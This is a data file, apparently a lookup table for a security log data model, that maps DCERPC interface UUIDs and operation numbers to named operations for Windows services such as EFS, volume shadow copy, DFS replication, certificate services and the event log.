df1941c5-fe89-4e79-bf10-463657acf44d:9 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE
df1941c5-fe89-4e79-bf10-463657acf44d:11 XDM_CONST.DCERPC_OPERATION_EFS_RPC_NOT_SUPPORTED
df1941c5-fe89-4e79-bf10-463657acf44d:12 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO
df1941c5-fe89-4e79-bf10-463657acf44d:13 XDM_CONST.DCERPC_OPERATION_EFS_RPC_DUPLICATE_ENCRYPTION_INFO_FILE
df1941c5-fe89-4e79-bf10-463657acf44d:15 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE_EX
df1941c5-fe89-4e79-bf10-463657acf44d:16 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO_EX
df1941c5-fe89-4e79-bf10-463657acf44d:18 XDM_CONST.DCERPC_OPERATION_EFS_RPC_GET_ENCRYPTED_FILE_METADATA
df1941c5-fe89-4e79-bf10-463657acf44d:19 XDM_CONST.DCERPC_OPERATION_EFS_RPC_SET_ENCRYPTED_FILE_METADATA
df1941c5-fe89-4e79-bf10-463657acf44d:20 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FLUSH_EFS_CACHE
df1941c5-fe89-4e79-bf10-463657acf44d:21 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_EX_SERV
df1941c5-fe89-4e79-bf10-463657acf44d:22 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_PROTECTORS
c681d488-d850-11d0-8c52-00c04fd90f7e:0 XDM_CONST.DCERPC_OPERATION_EFS_RPC_OPEN_FILE_RAW
c681d488-d850-11d0-8c52-00c04fd90f7e:1 XDM_CONST.DCERPC_OPERATION_EFS_RPC_READ_FILE_RAW
c681d488-d850-11d0-8c52-00c04fd90f7e:2 XDM_CONST.DCERPC_OPERATION_EFS_RPC_WRITE_FILE_RAW
c681d488-d850-11d0-8c52-00c04fd90f7e:3 XDM_CONST.DCERPC_OPERATION_EFS_RPC_CLOSE_RAW
c681d488-d850-11d0-8c52-00c04fd90f7e:4 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_SRV
c681d488-d850-11d0-8c52-00c04fd90f7e:5 XDM_CONST.DCERPC_OPERATION_EFS_DECRYPT_FILE_SRV
c681d488-d850-11d0-8c52-00c04fd90f7e:6 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_USERS_ON_FILE
c681d488-d850-11d0-8c52-00c04fd90f7e:7 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_RECOVERY_AGENTS
c681d488-d850-11d0-8c52-00c04fd90f7e:8 XDM_CONST.DCERPC_OPERATION_EFS_RPC_REMOVE_USERS_FROM_FILE
c681d488-d850-11d0-8c52-00c04fd90f7e:9 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE
c681d488-d850-11d0-8c52-00c04fd90f7e:11 XDM_CONST.DCERPC_OPERATION_EFS_RPC_NOT_SUPPORTED
c681d488-d850-11d0-8c52-00c04fd90f7e:12 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO
c681d488-d850-11d0-8c52-00c04fd90f7e:13 XDM_CONST.DCERPC_OPERATION_EFS_RPC_DUPLICATE_ENCRYPTION_INFO_FILE
c681d488-d850-11d0-8c52-00c04fd90f7e:15 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE_EX
c681d488-d850-11d0-8c52-00c04fd90f7e:16 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO_EX
c681d488-d850-11d0-8c52-00c04fd90f7e:18 XDM_CONST.DCERPC_OPERATION_EFS_RPC_GET_ENCRYPTED_FILE_METADATA
c681d488-d850-11d0-8c52-00c04fd90f7e:19 XDM_CONST.DCERPC_OPERATION_EFS_RPC_SET_ENCRYPTED_FILE_METADATA
c681d488-d850-11d0-8c52-00c04fd90f7e:20 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FLUSH_EFS_CACHE
c681d488-d850-11d0-8c52-00c04fd90f7e:21 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_EX_SERV
c681d488-d850-11d0-8c52-00c04fd90f7e:22 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_PROTECTORS
a8e0653c-2744-4389-a61d-7373df8b2292:0 XDM_CONST.DCERPC_OPERATION_GET_SUPPORTED_VERSION
a8e0653c-2744-4389-a61d-7373df8b2292:1 XDM_CONST.DCERPC_OPERATION_SET_CONTEXT
a8e0653c-2744-4389-a61d-7373df8b2292:2 XDM_CONST.DCERPC_OPERATION_START_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:3 XDM_CONST.DCERPC_OPERATION_ADD_TO_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:4 XDM_CONST.DCERPC_OPERATION_COMMIT_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:5 XDM_CONST.DCERPC_OPERATION_EXPOSE_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:6 XDM_CONST.DCERPC_OPERATION_RECOVERY_COMPLETE_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:7 XDM_CONST.DCERPC_OPERATION_ABORT_SHADOW_COPY_SET
a8e0653c-2744-4389-a61d-7373df8b2292:8 XDM_CONST.DCERPC_OPERATION_IS_PATH_SUPPORTED
a8e0653c-2744-4389-a61d-7373df8b2292:9 XDM_CONST.DCERPC_OPERATION_IS_PATH_SHADOW_COPIED
a8e0653c-2744-4389-a61d-7373df8b2292:10 XDM_CONST.DCERPC_OPERATION_GET_SHARE_MAPPING
a8e0653c-2744-4389-a61d-7373df8b2292:11 XDM_CONST.DCERPC_OPERATION_DELETE_SHARE_MAPPING
a8e0653c-2744-4389-a61d-7373df8b2292:12 XDM_CONST.DCERPC_OPERATION_PREPARE_SHADOW_COPY
897e2e5f-93f3-4376-9c9c-fd2277495c27:0 XDM_CONST.DCERPC_OPERATION_CHECK_CONNECTIVITY
897e2e5f-93f3-4376-9c9c-fd2277495c27:1 XDM_CONST.DCERPC_OPERATION_ESTABLISH_CONNECTION
897e2e5f-93f3-4376-9c9c-fd2277495c27:2 XDM_CONST.DCERPC_OPERATION_ESTABLISH_SESSION
897e2e5f-93f3-4376-9c9c-fd2277495c27:3 XDM_CONST.DCERPC_OPERATION_REQUEST_UPDATES
897e2e5f-93f3-4376-9c9c-fd2277495c27:4 XDM_CONST.DCERPC_OPERATION_REQUEST_VERSION_VECTOR
897e2e5f-93f3-4376-9c9c-fd2277495c27:5 XDM_CONST.DCERPC_OPERATION_ASYNC_POLL
897e2e5f-93f3-4376-9c9c-fd2277495c27:6 XDM_CONST.DCERPC_OPERATION_REQUEST_RECORDS
897e2e5f-93f3-4376-9c9c-fd2277495c27:7 XDM_CONST.DCERPC_OPERATION_UPDATE_CANCEL
897e2e5f-93f3-4376-9c9c-fd2277495c27:8 XDM_CONST.DCERPC_OPERATION_RAW_GET_FILE_DATA
897e2e5f-93f3-4376-9c9c-fd2277495c27:9 XDM_CONST.DCERPC_OPERATION_RDC_GET_SIGNATURES
897e2e5f-93f3-4376-9c9c-fd2277495c27:10 XDM_CONST.DCERPC_OPERATION_RDC_PUSH_SOURCE_NEEDS
897e2e5f-93f3-4376-9c9c-fd2277495c27:11 XDM_CONST.DCERPC_OPERATION_RDC_GET_FILE_DATA
897e2e5f-93f3-4376-9c9c-fd2277495c27:12 XDM_CONST.DCERPC_OPERATION_RDC_CLOSE
897e2e5f-93f3-4376-9c9c-fd2277495c27:13 XDM_CONST.DCERPC_OPERATION_INITIALIZE_FILE_TRANSFER_ASYNC
897e2e5f-93f3-4376-9c9c-fd2277495c27:15 XDM_CONST.DCERPC_OPERATION_RAW_GET_FILE_DATA_ASYNC
897e2e5f-93f3-4376-9c9c-fd2277495c27:16 XDM_CONST.DCERPC_OPERATION_RDC_GET_FILE_DATA_ASYNC
897e2e5f-93f3-4376-9c9c-fd2277495c27:17 XDM_CONST.DCERPC_OPERATION_RDC_FILE_DATA_TRANSFER_KEEP_ALIVE
4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:3 XDM_CONST.DCERPC_OPERATION_CREATE_OBJECT
4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:4 XDM_CONST.DCERPC_OPERATION_DELETE_OBJECT
4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:5 XDM_CONST.DCERPC_OPERATION_MODIFY_OBJECT
c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:6 XDM_CONST.DCERPC_OPERATION_CREATE_OBJECT
c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:7 XDM_CONST.DCERPC_OPERATION_DELETE_OBJECT
c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:8 XDM_CONST.DCERPC_OPERATION_MODIFY_OBJECT
d99e6e71-fc88-11d0-b498-00a0c90312f3:3 XDM_CONST.DCERPC_OPERATION_SET_EXTENSION
d99e6e71-fc88-11d0-b498-00a0c90312f3:4 XDM_CONST.DCERPC_OPERATION_SET_ATTRIBUTES
d99e6e71-fc88-11d0-b498-00a0c90312f3:5 XDM_CONST.DCERPC_OPERATION_RESUBMIT_REQUEST
d99e6e71-fc88-11d0-b498-00a0c90312f3:6 XDM_CONST.DCERPC_OPERATION_DENY_REQUEST
d99e6e71-fc88-11d0-b498-00a0c90312f3:7 XDM_CONST.DCERPC_OPERATION_IS_VALID_CERTIFICATE
d99e6e71-fc88-11d0-b498-00a0c90312f3:8 XDM_CONST.DCERPC_OPERATION_PUBLISH_CRL
d99e6e71-fc88-11d0-b498-00a0c90312f3:9 XDM_CONST.DCERPC_OPERATION_GET_CRL
d99e6e71-fc88-11d0-b498-00a0c90312f3:10 XDM_CONST.DCERPC_OPERATION_REVOKE_CERTIFICATE
d99e6e71-fc88-11d0-b498-00a0c90312f3:11 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW_COLUMN
d99e6e71-fc88-11d0-b498-00a0c90312f3:12 XDM_CONST.DCERPC_OPERATION_GET_VIEW_DEFAULT_COLUMN_SET
d99e6e71-fc88-11d0-b498-00a0c90312f3:13 XDM_CONST.DCERPC_OPERATION_ENUM_ATTRIBUTES_OR_EXTENSIONS
d99e6e71-fc88-11d0-b498-00a0c90312f3:14 XDM_CONST.DCERPC_OPERATION_OPEN_VIEW
d99e6e71-fc88-11d0-b498-00a0c90312f3:15 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW
d99e6e71-fc88-11d0-b498-00a0c90312f3:16 XDM_CONST.DCERPC_OPERATION_CLOSE_VIEW
d99e6e71-fc88-11d0-b498-00a0c90312f3:17 XDM_CONST.DCERPC_OPERATION_SERVER_CONTROL
d99e6e71-fc88-11d0-b498-00a0c90312f3:18 XDM_CONST.DCERPC_OPERATION_PING
d99e6e71-fc88-11d0-b498-00a0c90312f3:19 XDM_CONST.DCERPC_OPERATION_GET_SERVER_STATE
d99e6e71-fc88-11d0-b498-00a0c90312f3:20 XDM_CONST.DCERPC_OPERATION_BACKUP_PREPARE
d99e6e71-fc88-11d0-b498-00a0c90312f3:21 XDM_CONST.DCERPC_OPERATION_BACKUP_END
d99e6e71-fc88-11d0-b498-00a0c90312f3:22 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_ATTACHMENT_INFORMATION
d99e6e71-fc88-11d0-b498-00a0c90312f3:23 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_BACKUP_LOGS
d99e6e71-fc88-11d0-b498-00a0c90312f3:24 XDM_CONST.DCERPC_OPERATION_BACKUP_OPEN_FILE
d99e6e71-fc88-11d0-b498-00a0c90312f3:25 XDM_CONST.DCERPC_OPERATION_BACKUP_READ_FILE
d99e6e71-fc88-11d0-b498-00a0c90312f3:26 XDM_CONST.DCERPC_OPERATION_BACKUP_CLOSE_FILE
d99e6e71-fc88-11d0-b498-00a0c90312f3:27 XDM_CONST.DCERPC_OPERATION_BACKUP_TRUNCATE_LOGS
d99e6e71-fc88-11d0-b498-00a0c90312f3:28 XDM_CONST.DCERPC_OPERATION_IMPORT_CERTIFICATE
d99e6e71-fc88-11d0-b498-00a0c90312f3:29 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_DYNAMIC_FILES
d99e6e71-fc88-11d0-b498-00a0c90312f3:30 XDM_CONST.DCERPC_OPERATION_RESTORE_GET_DATABASE_LOCATIONS
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:31 XDM_CONST.DCERPC_OPERATION_PUBLISH_CR_LS
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:32 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:33 XDM_CONST.DCERPC_OPERATION_SET_CA_PROPERTY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:34 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY_INFO
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:35 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW_COLUMN_TABLE
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:36 XDM_CONST.DCERPC_OPERATION_GET_CA_SECURITY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:37 XDM_CONST.DCERPC_OPERATION_SET_CA_SECURITY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:38 XDM_CONST.DCERPC_OPERATION_PING2
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:39 XDM_CONST.DCERPC_OPERATION_GET_ARCHIVED_KEY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:40 XDM_CONST.DCERPC_OPERATION_GET_AUDIT_FILTER
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:41 XDM_CONST.DCERPC_OPERATION_SET_AUDIT_FILTER
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:42 XDM_CONST.DCERPC_OPERATION_GET_OFFICER_RIGHTS
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:43 XDM_CONST.DCERPC_OPERATION_SET_OFFICER_RIGHTS
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:44 XDM_CONST.DCERPC_OPERATION_GET_CONFIG_ENTRY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:45 XDM_CONST.DCERPC_OPERATION_SET_CONFIG_ENTRY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:46 XDM_CONST.DCERPC_OPERATION_IMPORT_KEY
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:47 XDM_CONST.DCERPC_OPERATION_GET_MY_ROLES
7fe0d935-dda6-443f-85d0-1cfb58fe41dd:48 XDM_CONST.DCERPC_OPERATION_DELETE_ROW
d99e6e70-fc88-11d0-b498-00a0c90312f3:3 XDM_CONST.DCERPC_OPERATION_REQUEST
d99e6e70-fc88-11d0-b498-00a0c90312f3:4 XDM_CONST.DCERPC_OPERATION_GET_CA_CERT
d99e6e70-fc88-11d0-b498-00a0c90312f3:5 XDM_CONST.DCERPC_OPERATION_PING
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:3 XDM_CONST.DCERPC_OPERATION_REQUEST
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:4 XDM_CONST.DCERPC_OPERATION_GET_CA_CERT
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:5 XDM_CONST.DCERPC_OPERATION_PING
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:6 XDM_CONST.DCERPC_OPERATION_REQUEST2
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:7 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:8 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY_INFO
5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:9 XDM_CONST.DCERPC_OPERATION_PING2
00020400-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_GET_TYPE_INFO_COUNT
00020400-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_GET_TYPE_INFO
00020400-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_GET_I_DS_OF_NAMES
00020400-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_INVOKE
00020401-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_GET_TYPE_ATTR
00020401-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_GET_TYPE_COMP
00020401-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_GET_FUNC_DESC
00020401-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_GET_VAR_DESC
00020401-0000-0000-c000-000000000046:7 XDM_CONST.DCERPC_OPERATION_GET_NAMES
00020401-0000-0000-c000-000000000046:8 XDM_CONST.DCERPC_OPERATION_GET_REF_TYPE_OF_IMPL_TYPE
00020401-0000-0000-c000-000000000046:9 XDM_CONST.DCERPC_OPERATION_GET_IMPL_TYPE_FLAGS
00020401-0000-0000-c000-000000000046:12 XDM_CONST.DCERPC_OPERATION_GET_DOCUMENTATION
00020401-0000-0000-c000-000000000046:13 XDM_CONST.DCERPC_OPERATION_GET_DLL_ENTRY
00020401-0000-0000-c000-000000000046:14 XDM_CONST.DCERPC_OPERATION_GET_REF_TYPE_INFO
00020401-0000-0000-c000-000000000046:16 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE
00020401-0000-0000-c000-000000000046:17 XDM_CONST.DCERPC_OPERATION_GET_MOPS
00020401-0000-0000-c000-000000000046:18 XDM_CONST.DCERPC_OPERATION_GET_CONTAINING_TYPE_LIB
d2d79df7-3400-11d0-b40b-00aa005ff586:0 XDM_CONST.DCERPC_OPERATION_OBJECTS_CHANGED
3a410f21-553f-11d1-8e5e-00a0c92c9d5d:3 XDM_CONST.DCERPC_OPERATION_CREATE_REMOTE_OBJECT
027947e1-d731-11ce-a357-000000000001:3 XDM_CONST.DCERPC_OPERATION_RESET
027947e1-d731-11ce-a357-000000000001:4 XDM_CONST.DCERPC_OPERATION_NEXT
027947e1-d731-11ce-a357-000000000001:5 XDM_CONST.DCERPC_OPERATION_NEXT_ASYNC
027947e1-d731-11ce-a357-000000000001:6 XDM_CONST.DCERPC_OPERATION_CLONE
027947e1-d731-11ce-a357-000000000001:7 XDM_CONST.DCERPC_OPERATION_SKIP
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:0 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_REMOTE_SUBSCRIPTION
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:1 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_NEXT_ASYNC
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:2 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_NEXT
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:3 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_WAIT_ASYNC
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:4 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_CONTROLLABLE_OPERATION
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:5 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_LOG_QUERY
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:6 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CLEAR_LOG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:7 XDM_CONST.DCERPC_OPERATION_EVT_RPC_EXPORT_LOG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:8 XDM_CONST.DCERPC_OPERATION_EVT_RPC_LOCALIZE_EXPORT_LOG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:9 XDM_CONST.DCERPC_OPERATION_EVT_RPC_MESSAGE_RENDER
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:10 XDM_CONST.DCERPC_OPERATION_EVT_RPC_MESSAGE_RENDER_DEFAULT
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:11 XDM_CONST.DCERPC_OPERATION_EVT_RPC_QUERY_NEXT
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:12 XDM_CONST.DCERPC_OPERATION_EVT_RPC_QUERY_SEEK
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:13 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CLOSE
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:14 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CANCEL
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:15 XDM_CONST.DCERPC_OPERATION_EVT_RPC_ASSERT_CONFIG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:16 XDM_CONST.DCERPC_OPERATION_EVT_RPC_RETRACT_CONFIG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:17 XDM_CONST.DCERPC_OPERATION_EVT_RPC_OPEN_LOG_HANDLE
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:18 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_LOG_FILE_INFO
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:19 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CHANNEL_LIST
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:20 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CHANNEL_CONFIG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:21 XDM_CONST.DCERPC_OPERATION_EVT_RPC_PUT_CHANNEL_CONFIG
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:22 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_LIST
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:23 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_LIST_FOR_CHANNEL
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:24 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_METADATA
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:25 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_RESOURCE_METADATA
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:26 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_EVENT_METADATA_ENUM
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:27 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_NEXT_EVENT_METADATA
f6beaff7-1e19-4fbb-9f8f-b89e2018337c:28 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CLASSIC_LOG_DISPLAY_NAME
7c4e1804-e342-483d-a43e-a850cfcc8d18:3 XDM_CONST.DCERPC_OPERATION_CREATE_APPLICATION
7c4e1804-e342-483d-a43e-a850cfcc8d18:4 XDM_CONST.DCERPC_OPERATION_DELETE_APPLICATION
7c4e1804-e342-483d-a43e-a850cfcc8d18:5 XDM_CONST.DCERPC_OPERATION_CREATE_APPLICATION_POOL
7c4e1804-e342-483d-a43e-a850cfcc8d18:6 XDM_CONST.DCERPC_OPERATION_DELETE_APPLICATION_POOL
7c4e1804-e342-483d-a43e-a850cfcc8d18:7 XDM_CONST.DCERPC_OPERATION_ENUMERATE_APPLICATIONS_IN_POOL
7c4e1804-e342-483d-a43e-a850cfcc8d18:8 XDM_CONST.DCERPC_OPERATION_RECYCLE_APPLICATION_POOL
7c4e1804-e342-483d-a43e-a850cfcc8d18:9 XDM_CONST.DCERPC_OPERATION_GET_PROCESS_MODE
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:10 XDM_CONST.DCERPC_OPERATION_INSTANCE_NAME
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:12 XDM_CONST.DCERPC_OPERATION_IS_INSTALL_REMOTE
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:14 XDM_CONST.DCERPC_OPERATION_IS_EXPORTABLE_REMOTE
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:16 XDM_CONST.DCERPC_OPERATION_GET_CERT_INFO_REMOTE
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:22 XDM_CONST.DCERPC_OPERATION_IMPORT_FROM_BLOB
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:23 XDM_CONST.DCERPC_OPERATION_IMPORT_FROM_BLOB_GET_HASH
bd0c73bc-805b-4043-9c30-9a28d64dd7d2:25 XDM_CONST.DCERPC_OPERATION_EXPORT_TO_BLOB
e8fb8620-588f-11d2-9d61-00c04f79c5fe:7 XDM_CONST.DCERPC_OPERATION_STOP
e8fb8620-588f-11d2-9d61-00c04f79c5fe:8 XDM_CONST.DCERPC_OPERATION_START
e8fb8620-588f-11d2-9d61-00c04f79c5fe:9 XDM_CONST.DCERPC_OPERATION_REBOOT
e8fb8620-588f-11d2-9d61-00c04f79c5fe:10 XDM_CONST.DCERPC_OPERATION_STATUS
e8fb8620-588f-11d2-9d61-00c04f79c5fe:11 XDM_CONST.DCERPC_OPERATION_KILL
c3fcc19e-a970-11d2-8b5a-00a0c9b7c9c4:3 XDM_CONST.DCERPC_OPERATION_GET_SERIALIZED_BUFFER
c3fcc19e-a970-11d2-8b5a-00a0c9b7c9c4:4 XDM_CONST.DCERPC_OPERATION_GET_OBJECT_IDENTIFY
034634fd-ba3f-11d1-856a-00a0c944138c:7 XDM_CONST.DCERPC_OPERATION_GET_TELNET_SESSIONS
034634fd-ba3f-11d1-856a-00a0c944138c:8 XDM_CONST.DCERPC_OPERATION_TERMINATE_SESSION
034634fd-ba3f-11d1-856a-00a0c944138c:9 XDM_CONST.DCERPC_OPERATION_SEND_MSG_TO_A_SESSION
8298d101-f992-43b7-8eca-5052d885b995:34 XDM_CONST.DCERPC_OPERATION_BACKUP_WITH_PASSWRD
8298d101-f992-43b7-8eca-5052d885b995:35 XDM_CONST.DCERPC_OPERATION_RESTORE_WITH_PASSWRD
8298d101-f992-43b7-8eca-5052d885b995:36 XDM_CONST.DCERPC_OPERATION_EXPORT
8298d101-f992-43b7-8eca-5052d885b995:37 XDM_CONST.DCERPC_OPERATION_IMPORT
8298d101-f992-43b7-8eca-5052d885b995:38 XDM_CONST.DCERPC_OPERATION_RESTORE_HISTORY
8298d101-f992-43b7-8eca-5052d885b995:39 XDM_CONST.DCERPC_OPERATION_ENUM_HISTORY
f612954d-3b0b-4c56-9563-227b7be624b4:40 XDM_CONST.DCERPC_OPERATION_GET_CHILD_PATHS
70b51430-b6ca-11d0-b9b9-00a0c922e750:3 XDM_CONST.DCERPC_OPERATION_ADD_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:4 XDM_CONST.DCERPC_OPERATION_DELETE_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:5 XDM_CONST.DCERPC_OPERATION_DELETE_CHILD_K_EYS
70b51430-b6ca-11d0-b9b9-00a0c922e750:6 XDM_CONST.DCERPC_OPERATION_ENUM_KEYS
70b51430-b6ca-11d0-b9b9-00a0c922e750:7 XDM_CONST.DCERPC_OPERATION_COPY_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:8 XDM_CONST.DCERPC_OPERATION_RENAME_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:9 XDM_CONST.DCERPC_OPERATION_R_SET_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:10 XDM_CONST.DCERPC_OPERATION_R_GET_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:11 XDM_CONST.DCERPC_OPERATION_DELETE_DATE
70b51430-b6ca-11d0-b9b9-00a0c922e750:12 XDM_CONST.DCERPC_OPERATION_R_ENUM_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:13 XDM_CONST.DCERPC_OPERATION_R_GET_ALL_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:14 XDM_CONST.DCERPC_OPERATION_DELETE_ALL_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:15 XDM_CONST.DCERPC_OPERATION_COPY_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:16 XDM_CONST.DCERPC_OPERATION_GET_DATA_PATHS
70b51430-b6ca-11d0-b9b9-00a0c922e750:17 XDM_CONST.DCERPC_OPERATION_OPEN_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:18 XDM_CONST.DCERPC_OPERATION_CLOSE_KEY
70b51430-b6ca-11d0-b9b9-00a0c922e750:19 XDM_CONST.DCERPC_OPERATION_CHANGE_PERMISSIONS
70b51430-b6ca-11d0-b9b9-00a0c922e750:20 XDM_CONST.DCERPC_OPERATION_SAVE_DATA
70b51430-b6ca-11d0-b9b9-00a0c922e750:21 XDM_CONST.DCERPC_OPERATION_GET_HANDLE_INFO
70b51430-b6ca-11d0-b9b9-00a0c922e750:22 XDM_CONST.DCERPC_OPERATION_GET_SYSTEM_CHANGE_NUMBER
70b51430-b6ca-11d0-b9b9-00a0c922e750:23 XDM_CONST.DCERPC_OPERATION_GET_DATA_SET_NUMBER
70b51430-b6ca-11d0-b9b9-00a0c922e750:24 XDM_CONST.DCERPC_OPERATION_SET_LAST_CHANGE_TIME
70b51430-b6ca-11d0-b9b9-00a0c922e750:25 XDM_CONST.DCERPC_OPERATION_GET_LAST_CHANGE_TIME
70b51430-b6ca-11d0-b9b9-00a0c922e750:26 XDM_CONST.DCERPC_OPERATION_R_KEY_EXCHANGE_PHASE1
